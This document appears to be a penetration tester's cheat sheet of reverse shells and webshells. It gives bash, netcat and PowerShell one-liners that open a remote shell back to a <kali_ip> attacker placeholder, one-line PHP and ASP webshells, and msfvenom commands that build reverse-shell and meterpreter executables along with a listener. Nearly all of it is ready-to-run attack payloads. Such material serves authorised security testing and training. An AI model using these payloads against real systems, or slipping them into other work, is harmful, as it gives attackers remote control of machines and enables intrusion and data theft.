- Linux revshells - NOTE: May need to URL encode when dealing with a webserver ```bash bash -c 'bash -i >& /dev/tcp/<kali_ip>/<port> 0>&1' rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc <kali_ip> <port> > /tmp/f #requires nc on target ``` - Windows revshell - NOTE: May need to URL encode when dealing with a webserver ```powershell powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<kali_ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" ``` - Simple PHP and ASP webshells - Can also use `Antak` or `WhiteWinterWolf` - For WIN, use `nishang` payload such as `Invoke-PowerSHellTcp.ps1` ```php <?php system($_GET['cmd']); ?> ``` ```asp <% eval request('cmd') %> ``` - Custom payloads - Pair with listener: `sudo nc -lvnp <port>` - NOTE: Payload can be `reverse_https` or `shell_reverse_tcp` ```bash sudo msfvenom -p linux/reverse_https LHOST=<kali_ip> LPORT=<port> -f elf > shell.elf sudo msfvenom -p windows/shell_reverse_tcp LHOST=<kali_ip> LPORT=<port> -f exe > shell.exe ``` - Meterpreter shells - Pair with `exploit/multi/handler` module in msf ```bash sudo msfvenom -p linux/meterpreter/shell_reverse_tcp LHOST=<kali_ip> LPORT=<port> -f elf > shell.elf sudo msfvenom -p windows/meterpreter/reverse_https LHOST=<kali_ip> LPORT=<port> -f exe -o shell.exe ```